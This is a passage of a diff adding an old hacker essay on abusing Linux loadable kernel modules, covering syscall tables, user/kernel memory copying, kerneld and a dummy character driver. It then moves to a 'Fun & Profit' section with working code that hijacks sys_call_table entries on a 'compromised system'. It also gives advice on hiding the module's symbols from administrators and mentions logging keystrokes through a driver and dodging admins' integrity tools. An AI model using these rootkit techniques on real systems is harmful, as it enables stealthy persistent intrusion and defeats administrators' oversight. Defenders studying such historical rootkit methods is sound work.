+#define SYS_nice		34
+#define SYS_ftime		35
+#define SYS_sync		36
+#define SYS_kill		37
+#define SYS_rename		38
+#define SYS_mkdir		39
+#define SYS_rmdir		40
+#define SYS_dup			41
+#define SYS_pipe		42
+#define SYS_times		43
+#define SYS_prof		44
+#define SYS_brk			45
+#define SYS_setgid		46
+#define SYS_getgid		47
+#define SYS_signal		48
+#define SYS_geteuid		49
+#define SYS_getegid		50
+#define SYS_acct		51
+#define SYS_phys		52
+#define SYS_lock		53
+#define SYS_ioctl		54
+#define SYS_fcntl		55
+#define SYS_mpx			56
+#define SYS_setpgid		57
+#define SYS_ulimit		58
+#define SYS_oldolduname		59
+#define SYS_umask		60
+#define SYS_chroot		61
+#define SYS_prev_ustat		62
+#define SYS_dup2		63
+#define SYS_getppid		64
+#define SYS_getpgrp		65
+#define SYS_setsid		66
+#define SYS_sigaction		67
+#define SYS_siggetmask		68
+#define SYS_sigsetmask		69
+#define SYS_setreuid		70
+#define SYS_setregid		71
+#define SYS_sigsuspend		72
+#define SYS_sigpending		73
+#define SYS_sethostname		74
+#define SYS_setrlimit		75
+#define SYS_getrlimit		76
+#define SYS_getrusage		77
+#define SYS_gettimeofday	78
+#define SYS_settimeofday	79
+#define SYS_getgroups		80
+#define SYS_setgroups		81
+#define SYS_select		82
+#define SYS_symlink		83
+#define SYS_oldlstat		84
+#define SYS_readlink		85
+#define SYS_uselib		86
+#define SYS_swapon		87
+#define SYS_reboot		88
+#define SYS_readdir		89
+#define SYS_mmap		90
+#define SYS_munmap		91
+#define SYS_truncate		92
+#define SYS_ftruncate		93
+#define SYS_fchmod		94
+#define SYS_fchown		95
+#define SYS_getpriority		96
+#define SYS_setpriority		97
+#define SYS_profil		98
+#define SYS_statfs		99
+#define SYS_fstatfs		100
+#define SYS_ioperm		101
+#define SYS_socketcall		102
+#define SYS_klog		103
+#define SYS_setitimer		104
+#define SYS_getitimer		105
+#define SYS_prev_stat		106
+#define SYS_prev_lstat		107
+#define SYS_prev_fstat		108
+#define SYS_olduname		109
+#define SYS_iopl		110
+#define SYS_vhangup		111
+#define SYS_idle		112
+#define SYS_vm86old		113
+#define SYS_wait4		114
+#define SYS_swapoff		115
+#define SYS_sysinfo		116
+#define SYS_ipc			117
+#define SYS_fsync		118
+#define SYS_sigreturn		119
+#define SYS_clone		120
+#define SYS_setdomainname	121
+#define SYS_uname		122
+#define SYS_modify_ldt		123
+#define SYS_adjtimex		124
+#define SYS_mprotect		125
+#define SYS_sigprocmask		126
+#define SYS_create_module	127
+#define SYS_init_module		128
+#define SYS_delete_module	129
+#define SYS_get_kernel_syms	130
+#define SYS_quotactl		131
+#define SYS_getpgid		132
+#define SYS_fchdir		133
+#define SYS_bdflush		134
+#define SYS_sysfs		135
+#define SYS_personality		136
+#define SYS_afs_syscall		137 /* Syscall for Andrew File System */
+#define	SYS_setfsuid		138
+#define	SYS_setfsgid		139
+#define	SYS__llseek		140
+#define SYS_getdents		141
+#define SYS__newselect		142
+#define SYS_flock		143
+#define SYS_syscall_flock	SYS_flock
+#define SYS_msync		144
+#define SYS_readv		145
+#define SYS_syscall_readv	SYS_readv
+#define SYS_writev		146
+#define SYS_syscall_writev	SYS_writev
+#define SYS_getsid		147
+#define SYS_fdatasync		148
+#define SYS__sysctl		149
+#define SYS_mlock		150
+#define SYS_munlock		151
+#define SYS_mlockall		152
+#define SYS_munlockall		153
+#define SYS_sched_setparam	154
+#define SYS_sched_getparam	155
+#define SYS_sched_setscheduler	156
+#define SYS_sched_getscheduler	157
+#define SYS_sched_yield		158
+#define SYS_sched_get_priority_max	159
+#define SYS_sched_get_priority_min	160
+#define SYS_sched_rr_get_interval	161
+#define SYS_nanosleep		162
+#define SYS_mremap		163
+#define SYS_setresuid		164
+#define SYS_getresuid		165
+#define SYS_vm86		166
+#define SYS_query_module	167
+#define SYS_poll		168
+#define SYS_syscall_poll	SYS_poll
+
+#endif	/* <sys/syscall.h> */
+</xmp>
+
+Every systemcall has a defined number (see listing above), which is actually
+used to make the systemcall.<br>
+The Kernel uses interrupt 0x80 for managing every systemcall.  The systemcall
+number and any arguments are moved to some registers (eax for systemcall number,
+for example).<br>
+The systemcall number is an index in an array of a kernel structure called
+sys_call_table[]. This structure maps the systemcall numbers to the needed
+service function.<br>
+Ok, this should be enough knowledge to continue reading. The following table
+lists the most interesting systemcalls plus a short description.
+Believe me, you have to know the exact working of those systemcalls in order to
+make really useful LKMs.<br>
+
+<TABLE border=5 width=100%>
+<tr>
+
+<th>systemcall</th>
+<th>description</th>
+
+
+<tr>
+<td>int sys_brk(unsigned long new_brk);</td>
+<td>changes the size of used DS (data segment)
+ ->this systemcall will be discussed in I.4</td>
+</tr>
+
+
+<tr>
+<td>int sys_fork(struct pt_regs regs);</td>  
+<td>systemcall for the well-know fork() function in user space</td>
+</tr>
+
+<tr>
+<td>int sys_getuid     
+()<br>
+int sys_setuid
+(uid_t uid)<br>
+...</td>
+<td>systemcalls for managing UID etc.</td>
+</tr>
+
+
+
+<tr>
+<td>int sys_get_kernel_sysms(struct kernel_sym *table)</td>
+<td>systemcall for accessing the kernel system table (-> I.3)</td>
+</tr>
+
+<tr>
+<td>int sys_sethostname      
+(char *name,              
+ int len);<br>                
+int sys_gethostname
+(char *name,
+ int len);<br></td>
+<td>sys_sethostname is responsible for setting the hostname, and sys_gethostname for retrieving
+it</td>
+</tr>
+
+<tr>
+<td>int sys_chdir
+(const char *path);<br> 	  
+int sys_fchdir           
+(unsigned int fd);<br></td>
+<td>both function are used for setting the current directory (cd ...)</td>
+</tr>
+
+<tr>
+<td>int sys_chmod        
+(const char 
+ *filename, mode_t  
+ mode);<br>
+int sys_chown
+(const char 
+ *filename, mode_t  
+ mode);<br>
+int sys_fchmod
+(unsigned int
+ fildes, mode_t
+ mode);<br>
+int sys_fchown
+(unsigned int
+ fildes, mode_t
+ mode);<br></td>
+<td>functions for managing permissions and so on</td>
+</tr>
+
+<tr>
+<td>int sys_chroot      
+(const char 
+ *filename);</td>
+<td>sets root directory for calling process</td>
+</tr>
+
+<tr>
+<td>int sys_execve      
+(struct pt_regs regs);</td>    
+<td>important systemcall -> it is responsible for executing file (pt_regs is the register stack)</td>
+</tr>
+
+<tr>
+<td>long sys_fcntl    
+(unsigned int fd,
+ unsigned int cmd,
+ unsigned long arg);</td>
+<td>changing characteristics of fd (opened file descr.)</td>
+</tr>
+
+<tr>
+<td>int sys_link           
+(const char *oldname,
+ const char *newname);<br>
+int sym_link
+(const char *oldname,
+ const char *newname);<br>
+int sys_unlink
+(const char *name);<br></td>
+<td>systemcalls for hard- / softlinks management</td>
+</tr>
+
+<tr>
+<td>int sys_rename         
+(const char *oldname,
+ const char *newname);</td>
+<td>file renaming</td>
+</tr>
+
+<tr>
+<td>int sys_rmdir	          
+(const char* name);<br>
+int sys_mkdir
+(const *char filename,
+ int mode);<br></td>
+<td>creating & removing directories</td>
+</tr>
+
+<tr>
+<td>int sys_open             
+(const char *filename,   
+int mode);<br>
+int sys_close
+(unsigned int fd);<br></td>
+<td>everything concering opening files (also creation), and also closing them</td>
+</tr>
+
+<tr>
+<td>int sys_read
+(unsigned int fd,
+ char *buf, unsigned int
+ count);<br>
+int sys_write
+(unsigned int fd,
+ char *buf, unsigned int
+ count);<br></td>
+<td>systemcalls for writing & reading from Files</td>
+</tr>
+
+<tr>
+<td>int sys_getdents      
+(unsigned int fd,
+ struct dirent *dirent,
+ unsigned int count);</td>
+<td>systemcall which retrievs file listing (ls ... command)  </td>
+</tr>
+
+<tr>
+<td>int sys_readlink         
+(const char *path,
+ char *buf, int bufsize);</td>
+<td>reading symbolic links</td>
+</tr>
+
+<tr>
+<td>int sys_selectt          
+(int n, fd_set *inp, 
+fd_set *outp, fd_set 
+ *exp, struct timeval
+ *tvp);</td>
+<td>multiplexing of I/O operations</td>
+</tr>
+
+<tr>
+<td>sys_socketcall           
+(int call, unsigned long  
+ args);</td>
+<td>socket functions</td>
+</tr>
+
+<tr>
+<td>unsigned long            
+sys_create_module
+(char *name, unsigned 
+long size);<br>
+int sys_delete_module
+(char *name);<br>
+int sys_query_module
+(const char *name,
+ int which,
+ void *buf,
+ size_t bufsize,
+ size_t *ret);<br></td>
+<td>used for loading / unloading LKMs and querying</td> 
+</tr>
+</table>
+
+In my opinion these are the most interesting systemcalls for any hacking
+intention, of course it is possible that you may need something special on your
+rooted system, but the average hacker has a plenty of possibilities with the
+listing above. In part II you will learn how to use the systemcalls for your
+profit.
+
+
+<H3><A NAME="I.3."></A>3. What is the Kernel-Symbol-Table</h3>
+
+Ok, we understand the basic concept of systemcalls and modules. But there is
+another very important point we need to understand - the Kernel Symbol Table.
+Take a look at /proc/ksyms. Every entry in this file represents an exported
+(public) Kernel Symbol, which can be accessed by our LKM. Take a deep look
+in that file, you will find many interesting things in it. <br>
+This file is really very interesting, and can help us to see what our LKM can
+get; but there is one problem. Every Symbol used in our LKM (like a function) is
+also exportet to the public, and is also listed in that file. So an experienced
+admin could discover our little LKM and kill it.<br>
+There are lots of methods to prevent the admin from seeing our LKM, look at
+section II.<br>
+The methods mentioned in II can be called 'Hacks', but when you take a look at
+the contents of section II you won't find any reference to 'Keeping LKM Symbols
+out of /proc/ksyms'. The reason for not mentioning this problem in II is the
+following :<br>
+you won't need a trick to keep your module symbols away from /proc/ksyms.
+LKM devolopers are able to use the following piece of regular code to limit the
+exported symbols of their module:<br>
+
+<xmp>
+static struct symbol_table module_syms= { /*we define our own symbol table !*/
+ #include <linux/symtab_begin.h>          /*symbols we want to export, do we ?*/
+   ...                                       
+};
+
+register_symtab(&module_syms);            /*do the actual registration*/
+</xmp>
+
+As I said, we don't want to export any symbols to the public, so we use the
+following construction :
+
+<xmp>
+register_symtab(NULL);
+</xmp>
+
+This line must be inserted in the init_module() function, remember this !
+
+
+<H3><A NAME="I.4."></A>4. How to transform Kernel to User Space Memory </h3>
+
+Till now this essay was very very basic and easy. Now we come to stuff
+more difficult (but not more advanced).<br>
+We have many advantages because of coding in kernel space, but we also have some
+disadvantages. systemcalls get their arguments from user space (systemcalls are 
+implemented in wrappers like libc), but our LKM runs in kernel space. In section
+II you will see that it is very important for us to check the arguments of
+certain systemcalls in order to act the right way. But how can we access an
+argument allocated in user space from our kernel space module ?
+<br><i>Solution</i> : We have to make a <i>transition</i>.<br>
+This may sound a bit strange for non-kernel-hackers, but is really easy. Take
+the following systemcall :<br>
+
+<xmp>
+int sys_chdir (const char *path)
+</xmp>
+
+Imagine the system calling it, and we intercept that call (we will learn this in
+section II). We want to check the path the user wants to set, so we have to
+access const char *path. If you try to access the path variable directly like
+
+<xmp>
+printk("<1>%s\n", path);
+</xmp>
+
+you will get <i>real</i> problems...<br>
+Remember you are in kernel space, you <i>cannot</i> read user space memory easily.
+Well in Phrack 52 you get a solution by plaguez, which is specialized for strings
+He uses a kernel mode function (macro) for retrieving user space memory bytes :
+
+<xmp>
+#include <asm/segment.h>
+
+get_user(pointer);
+</xmp>
+
+Giving this function a pointer to our *path location helps ous getting the bytes
+from user space memory to kernel space. Look at the implemtation made by plaguez
+for moving strings from user to kernel space:<br>
+
+<xmp>
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+    char *tmp = src;
+    int compt = 0;
+
+    do {
+	dest[compt++] = __get_user(tmp++, 1);
+    }
+    while ((dest[compt - 1] != '\0') && (compt != n));
+
+    return dest;
+}
+</xmp>
+
+If we want to convert our *path variable we can use the following piece of kernel
+code :
+
+<xmp>
+ char *kernel_space_path;
+
+ kernel_space_path = (char *) kmalloc(100, GFP_KERNEL); /*allocating memory 
+                                                        in kernel space*/
+ (void) strncpy_fromfs(test, path, 20);                 /*calling plaguez's 
+                                                        function*/
+ printk("<1>%s\n", kernel_space_path);                  /*now we can use
+                                                        the data for whatever we
+                                                        want*/
+ kfree(test);                                           /*remember freeing the
+                                                        memory*/
+</xmp>
+
+The code above works very fine. For a general transition it is too complicated;
+plaguez used it only for strings (the functions is made only for string copies).
+For normal data transitions the following function is the easiest way of doing:
+
+<xmp>
+#include <asm/segment.h>
+void memcpy_fromfs(void *to, const void *from, unsigned long count);
+</xmp>
+
+
+Both functions are obviously based on the same kind of commands, but the second
+one is nearly the same as plaguez's newly defined function. I would recommand
+using memcpy_fromfs(...) for general data transitions and plaguez's one for
+string copying tasks.<br>
+Now we know how to convert <i>from</i> user space memory <i>to</i> kernel space. But what
+about the other direction ? This is a bit harder, because we cannot easily
+allocate user space memory from our kernel space position. If we could manage this
+problem we could use<br>
+
+<xmp>
+#include <asm/segment.h>
+void memcpy_tofs(void *to, const void *from, unsigned long count);
+</xmp>
+
+doing the actual converting. But how to allocate user space for the *to pointer?
+plaguez's Phrack essay gives us the best solution :
+
+<xmp>
+/*we need brk systemcall*/
+static inline _syscall1(int, brk, void *, end_data_segment);
+
+...
+
+int ret, tmp;
+char *truc = OLDEXEC;
+char *nouveau = NEWEXEC;
+unsigned long mmm;
+
+mmm = current->mm->brk;
+ret = brk((void *) (mmm + 256));
+if (ret < 0)
+   return ret;
+memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
+</xmp>
+
+This is a very nice trick used here. current is a pointer to the task structure
+of the current process; mm is the pointer to the mm_struct - responsible for
+the memory management of that process. By using the brk-systemcall on current->
+mm->brk we are able to increase the size of the unused area of the datasegment.
+And as we all know allocating memory is done by playing with the datasegment,
+so by increasing the unused area size, we have allocated some piece of memory
+for the current process. This memory can be used for copying the kernel space
+memory to user space (of the current process).<br>
+You may wonder about the first line from the code above. This line helps us to
+use user space like functions in kernel space.Every user space function provided
+to us (like fork, brk, open, read, write, ...) is represented by a _syscall(...)
+macro. So we can construct the exact syscall-macro for a certain user space
+function (represented by a systemcall); here for brk(...).<br>
+See I.5 for a detailed explanation.
+
+<H3><A NAME="I.5."></A>5.  Ways to use user space like functions</h3>
+
+As you saw in I.4 we used a syscall macro for constructing our own brk call,
+which is like the one we know from user space (->brk(2)). The truth about the
+user space library funtions (not all) is that they all are implemented through
+such syscall macros. The following code shows the _syscall1(..) macro used in
+I.4 to construct the brk(..) function (taken from /asm/unistd.h). <br>
+
+<xmp>
+#define _syscall1(type,name,type1,arg1) \
+type name(type1 arg1) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+	: "=a" (__res) \
+	: "0" (__NR_##name),"b" ((long)(arg1))); \
+if (__res >= 0) \
+	return (type) __res; \
+errno = -__res; \
+return -1; \
+}
+</xmp>
+
+You don't need to understand this code in its full function, it just calls
+interrupt 0x80 with the arguments provided by the _syscall1 parameters (-> I.2).
+name stands for the systemcall we need (the name is expanded to __NR_name, which
+is defined in /asm/unistd.h). This way we implemted the brk function. Other
+functions with a different count of arguments are implemented through other
+macros (_syscallX, where X stands for the number of arguments). <br>
+I personally use another way of implementing functions; look at the following 
+example :
+
+<xmp>
+int (*open)(char *, int, int); /*declare a prototype*/
+
+open = sys_call_table[SYS_open];  /*you can also use __NR_open*/
+</xmp>
+
+This way you don't need to use any syscall macro, you just use the function
+pointer from the sys_call_table. While searching the web, I found that this
+way of contructing user space like functions is also used in the famous LKM
+infector by SVAT. In my opinion this is the better solution, but test it and
+judge yourself.<br>
+Be careful when supplying arguments for those systemcalls, they need them in
+user space not from your kernel space position. Read I.4 for ways to bring your
+kernel space data to user space memory.<br>
+A very easy way doing this (the best way in my opinion) is playing with the
+needed registers. You have to know that Linux uses segment selectors to
+differentiate between kernel space, user space and so on. Arguments used with
+systemcalls which were issued from user space are somewhere in the data segment
+selector (DS) range. [I did not mention this in I.4,because it fits more in this
+section.]<br>
+DS can be retrieved by using get_ds() from asm/segment.h. So the data used as
+parameters by systemcalls can only be accessed from kernel space if we set
+the segment selector used for the user segment by the kernel to the needed DS
+value. This can be done by using set_fs(...). But be careful,you have to restore
+FS after you accessed the argument of the systemcall. So let's look at a code
+fragment showing something useful :<br>
+
+<xmp>
+->filename is in our kernel space; a string we just created, for example
+
+unsigned long old_fs_value=get_fs();
+
+set_fs(get_ds);               /*after this we can access the user space data*/
+open(filename, O_CREAT|O_RDWR|O_EXCL, 0640);
+set_fs(old_fs_value);         /*restore fs...*/
+</xmp>
+
+In my opinion this is the easiet / fastest way of solving the problem, but test
+it yourself (again).<br>
+Remember that the functions I showed till now (brk, open) are all implemented
+through a single systemcall. But there are also groups of user space functions 
+which are summarized into one systemcall. Take a look at the listing of
+interesting systemcalls (I.2); the sys_socketcall, for example, implements every
+function concering sockets (creation, closing, sending, receiving,...). So be
+careful when constructing your functions; always take a look at the kernel 
+sources.<br>
+
+<H3><A NAME="I.6."></A>6. List of daily needed Kernelspace Functions</h3>
+
+I introduced the printk(..) function in the beginning of this text. It is a
+function everyone can use in kernel space, it is a so called kernel function.
+Those functions are made for kernel developers who need complex functions which
+are normally only available through a library function. The following listing
+shows the most important kernel functions we often need :
+
+<TABLE border=5 width=100%>
+<tr>
+
+<th>function/macro</th>
+<th>description</th>
+
+<tr>
+<td>int sprintf  
+(char *buf, 
+const char *fmt,
+...);<br>
+int vsprintf
+(char *buf,
+const char *fmt,
+va_list args);<br></td>
+<td>functions for packing data into strings</td>
+</tr>
+
+<tr>
+<td>printk           
+(...)</td>
+<td>the same as printf in user space</td>
+</tr>
+
+<tr>
+<td>void *memset	          
+(void *s, char c,
+size_t count);<br>
+void *memcpy
+(void *dest, const void
+*src, size_t count);<br>
+char *bcopy
+(const char *src,
+char *dest, int count);<br>
+void *memmove
+(void *dest, const void
+*src, size_t count);<br>
+int memcmp
+(const void *cs,
+const void *ct, size_t
+count);<br>
+void *memscan
+(void *addr, unsigned char
+c, size_t size);<br></td>
+<td>memory functions</td>
+</tr>
+
+<tr>
+<td>int register_symtab       
+(struct symbol_table 
+*intab);</td>
+<td>see I.1</td>
+</tr>
+
+<tr>
+<td>char *strcpy               
+(char *dest, const char
+*src);<br>
+char *strncpy
+(char *dest, const char
+*src, size_t count);<br>
+char *strcat
+(char *dest, const char *src);<br>
+char *strncat
+(char *dest, const char
+*src, size_t count);<br>
+int strcmp
+(const char *cs, 
+const char *ct);<br>
+int strncmp
+(const char *cs,const 
+char *ct, size_t count);<br>
+char *strchr
+(const char *s, char c);<br>
+size_t strlen
+(const char *s);<br>
+size_t strnlen
+(const char *s,
+size_t count);<br>
+size_t strspn
+(const char *s,
+const char *accept);<br>
+char *strpbrk
+(const char *cs, 
+const char *ct);<br>
+char *strtok
+(char *s, const char *ct);<br></td>
+<td>string compare functions etc.</td>
+</tr>
+
+<tr>
+<td>unsigned long              
+simple_strtoul
+(const char *cp,
+char **endp, unsigned int
+base);</td>
+<td>converting strings to number</td>
+</tr>
+
+<tr>
+<td>get_user_byte              
+(addr);<br>
+put_user_byte
+(x, addr);<br>
+get_user_word
+(addr);<br>
+put_user_word
+(x, addr);<br>
+get_user_long
+(addr);<br>
+put_user_long
+(x, addr);<br></td>
+<td>functions for accessing user memory</td>
+</tr>
+
+<tr>
+<td>suser();<br>                   
+fsuser();<br></td>
+<td>checking for SuperUser rights</td>
+</tr>
+
+<tr>
+<td>int register_chrdev       
+(unsigned int major,        
+const char *name,           
+struct file_o perations 
+*fops);<br>
+int unregister_chrdev
+(unsigned int major, 
+const char *name);<br>
+int register_blkdev
+(unsigned int major,
+const char *name,
+struct file_o perations
+*fops);<br>
+int unregister_blkdev
+(unsigned int major,
+const char *name);<br></td>
+<td>functions which register device driver<br>
+..._chrdev -> character devices<br>
+..._blkdev -> block devices<br></td>
+</tr>
+</table>
+
+Please remember that some of those function may also be made available through
+the method mentoined in I.5. But you should understand, that it is not very
+useful contructing nice user space like functions, when the kernel gives them
+to us for free.<br>
+Later on you will see that these functions (especially string comaprisons) are
+very important for our purposes.<br>
+
+
+<H3><A NAME="I.7."></A>7. What is the Kernel-Daemon </h3>
+
+Finally we nearly reached the end of the basic part. Now I will explain the
+working of the Kernel-Daemon (/sbin/kerneld). As the name suggest this is a
+process in user space waiting for some action. First of all you must know that
+it is necessary to activite the kerneld option while building the kernel, in
+order to use kerneld's features. Kerneld works the following way : If the kernel
+wants to access a resource (in kernel space of course), which is not present
+at that moment, he does <i>not</i> produce an error. Instead of doing this he asks
+kerneld for that resource. If kerneld is able to provide the resource, it loads
+the required LKM and the kernel can continue working. By using this scheme it is
+possible to load and unload LKMs only when they are really needed / not needed.
+It should be clear that this work needs to be done both in user and in kernel
+space.<br>
+Kerneld exists in user space. If the kernel requests a new module this daemon
+receives a string from the kernel telling it which module to load.It is possible
+that the kenel sends a generic name (instead of the name of object file) like
+eth0. In this case the system need to lookup /etc/modules.conf for alias lines.
+Those lines match generic names to the LKM required on that system.<br>
+The following line says that eth0 is represented by a DEC Tulip driver LKM :<br>
+
+<xmp>
+# /etc/modules.conf          # or /etc/conf.modules - this differs
+alias eth0 tulip
+</xmp>
+
+This was the user space side represented by the kerneld daemon. The kernel space
+part is mainly represented by 4 functions. These functions are all based on
+a call to kerneld_send. For the exact way kerneld_send is involved by calling
+those functions look at linux/kerneld.h.  The following table lists the 4
+functions mentioned above :<br>
+
+<TABLE border=5 width=100%>
+<tr>
+
+<th>function</th>
+<th>description</th>
+
+<tr>
+<td>int sprintf  
+(char *buf, 
+const char *fmt,
+...);<br>
+int vsprintf
+(char *buf,
+const char *fmt,
+va_list args);<br></td>
+<td>functions for packing data into strings</td>
+</tr>
+
+<tr>
+<td>int request_module           
+(const char *name);</td>           
+<td>says kerneld that the kernel requires a certain module (given a name or gerneric ID / name)<td>
+<tr>
+
+<tr>
+<td>int release_module           
+(const char* name,
+int waitflag);</td>
+<td>unload a module</td>
+<tr>
+
+<tr>
+<td>int delayed_release_module   
+(const char *name);</td>
+<td>delayed unload</td>
+<tr>
+
+<tr>
+<td>int cancel_release_module    
+(const char *name);</td>
+<td>cancels a call of delayed_release_module</td>
+<tr>
+</table>
+<i>Note</i> : Kernel 2.2 uses another scheme for requesting modules. Take a look at part
+V.
+
+<H3><A NAME="I.8."></A>8. Creating your own Devices</h3>
+
+Appendix A introduces a TTY Hijacking util, which will use a device to log its
+results. So we have to look at a very basic example of a device driver.
+Look at the following code (this is a very basic driver, I just wrote it for
+demonstration, it does implement nearly no operations...) :<br>
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+/*just a dummy for demonstration*/
+static int driver_open(struct inode *i, struct file *f)
+{
+ printk("<1>Open Function\n");
+ return 0;
+}
+
+/*register every function which will be provided by our driver*/
+static struct file_operations fops = {
+NULL,                 /*lseek*/
+NULL,                 /*read*/
+NULL,                 /*write*/
+NULL,                 /*readdir*/
+NULL,                 /*select*/
+NULL,                 /*ioctl*/
+NULL,                 /*mmap*/
+driver_open,          /*open, take a look at my dummy open function*/
+NULL,                 /*release*/
+NULL                  /*fsync...*/
+};
+
+
+int init_module(void)
+{
+ /*register driver with major 40 and the name driver*/
+ if(register_chrdev(40, "driver", &fops)) return -EIO;
+  return 0;
+}
+
+void cleanup_module(void)
+{
+ /*unregister our driver*/
+ unregister_chrdev(40, "driver");
+}
+</xmp>
+The most important important function is register_chrdev(...) which registers
+our driver with the major number 40. If you want to access this driver,do the
+following :
+
+<xmp>
+# mknode /dev/driver c 40 0
+
+# insmod driver.o
+</xmp>
+
+After this you can access that device (but i did not implement any functions due
+to lack of time...). The file_operations structure provides every function
+(operation) which our driver will provide to the system. As you can see I did
+only implement a very (!) basic dummy function just printing something. 
+It should be clear that you can implement your own devices in a very easy way
+by using the methods above. Just do some experiments. If you log some data (key
+strokes, for example) you can build a buffer in your driver that exports its 
+contents through the device interface).
+
+
+
+<u><b>
+<H2>II. Fun & Profit</H2>
+</u></b>
+<P><P>
+
+
+<H3><A NAME="II.1."></A>1. How to intercept Syscalls</h3>
+
+Now we start abusing the LKM scheme. Normally LKMs are used to extend the kernel
+(especially hardware drivers). Our 'Hacks' will do something different, they
+will intercept systemcalls and modify them in order to change the way the system
+reacts on certain commands.<br>
+The following module makes it impossible for any user on the compromised system
+to create directories. This is just a little demonstration to show the way we
+follow.<br>
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];       /*sys_call_table is exported, so we
+                                     can access it*/               
+
+int (*orig_mkdir)(const char *path); /*the original systemcall*/
+
+
+int hacked_mkdir(const char *path)
+{
+ return 0;                           /*everything is ok, but he new systemcall
+                                     does nothing*/
+}
+
+int init_module(void)                /*module setup*/
+{
+ orig_mkdir=sys_call_table[SYS_mkdir];
+ sys_call_table[SYS_mkdir]=hacked_mkdir;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_mkdir]=orig_mkdir; /*set mkdir syscall to the origal
+                                       one*/
+}
+</xmp>
+
+Compile this module and start it (see I.1). Try to make a directory, it will
+not work.Because of returning 0 (standing for OK) we don't get an error message.
+After removing the module making directories is possible again. 
+As you can see, we only need to change the corresponding entry in sys_call_table
+(see I.2) for intercepting a kernel systemcall.<br>
+The general approach to intercepting a systemcall is outlined in the following
+list :<br>
+<ul>
+
+<li> find your systemcall entry in sys_call_table[] (take a look at include/sys/
+  syscall.h)<br>
+<li> save the old entry of sys_call_table[X] in a function pointer (where X stands
+  for the systemcallnumber you want to intercept)<br>
+<li> save the address of the new (hacked) systemcall you defined yourself by
+  setting sys_call_table[X] to the needed function address<br>
+</ul>
+
+You will recognize that it is very useful to save the old systemcall function 
+pointer, because you will need it in your hacked one for emulating the original
+call.  The first question you have to face when writing a 'Hack-LKM  ' is : <br>
+<i>'Which systemcall should I intercept'.</i><br>
+
+<H3><A NAME="II.2."></A>2. Interesting Syscalls to Intercept</h3>
+Perhaps you are not a 'kernel god' and you don't know every systemcall for every
+user space function an application or command can use. So I will give you some 
+hints on finding your systemcalls to take control over.<br>
+<ol type="a">
+<li>read source code. On systems like Linux you can have the source code on
+    nearly any program a user (admin) can use. Once you have found a basic
+    function like dup, open, write, ... go to b<br>
+<li>take a look at include/sys/syscall.h (see I.2). Try to find a directly
+    corresponding systemcall (search for dup -> you will find SYS_dup; search
+    for write -> you will find SYS_write; ...). If this does not work got to c<br>
+<li>some calls like socket, send, receive, ... are implemented through one
+    systemcall - as I said before. Take a look at the include file mentioned
+    for related systemcalls.<br>
+</ol>
+
+Remember not every C-lib function is a systemcall ! Most functions are totally 
+unrelated to any systemcalls !<br>
+A little more experienced hackers should take a look at the systemcall listing
+in I.2 which provides enough information. It should be clear that User ID management
+is implemented through the uid-systemcalls etc. If you really want to be sure 
+you can also take a look at the library sources / kernel sources.<br>
+The hardest problem is an admin writing its own applications for checking system
+integrity / security. The problem concerning those programs is the lack of source
+code. We cannot say how this program exactly works and which systemcalls we have
+to intercept in order to hide our presents / tools. It may even be possible that 
+he introduced a LKM hiding itself which implements cool hacker-like systemcalls
+for checking the system security (the admins often use hacker techniques to defend
+their system...). So how do we proceed.<br>
+
+<H4><A NAME="II.2.1."></A>2.1  Finding interesting systemcalls (the strace approach)</h4>
+
+Let's say you know the super-admin program used to check the system (this can 
+be done in some ways,like TTY hijacking (see II.9 / Appendix A), the only problem
+is that you need to hide your presents from the super-admin program until that
+point..).<br>
+So run the program (perhaps you have to be root to execute it) using strace.
+
+<xmp>
+# strace super_admin_proggy
+</xmp>
+
+This will give you a really nice output of every systemcall made by that program
+including the systemcalls which may be added by the admin through his hacking
+LKM (could be possible). I don't have a super-admin-proggy for showing you a
+sample output, but take a look at the output of 'strace whoami' :<vr>
+
+<xmp>
+execve("/usr/bin/whoami", ["whoami"], [/* 50 vars */]) = 0
+mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40007000
+mprotect(0x40000000, 20673, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
+mprotect(0x8048000, 6324, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
+stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=13363, ...}) = 0
+open("/etc/ld.so.cache", O_RDONLY)      = 3
+mmap(0, 13363, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
+close(3)                                = 0
+stat("/etc/ld.so.preload", 0xbffff780)  = -1 ENOENT (No such file or directory)
+open("/lib/libc.so.5", O_RDONLY)        = 3
+read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
+mmap(0, 761856, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000c000
+mmap(0x4000c000, 530945, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000c000
+mmap(0x4008e000, 21648, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x81000) = 0x4008e000
+mmap(0x40094000, 204536, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40094000
+close(3)                                = 0
+mprotect(0x4000c000, 530945, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
+munmap(0x40008000, 13363)               = 0
+mprotect(0x8048000, 6324, PROT_READ|PROT_EXEC) = 0
+mprotect(0x4000c000, 530945, PROT_READ|PROT_EXEC) = 0
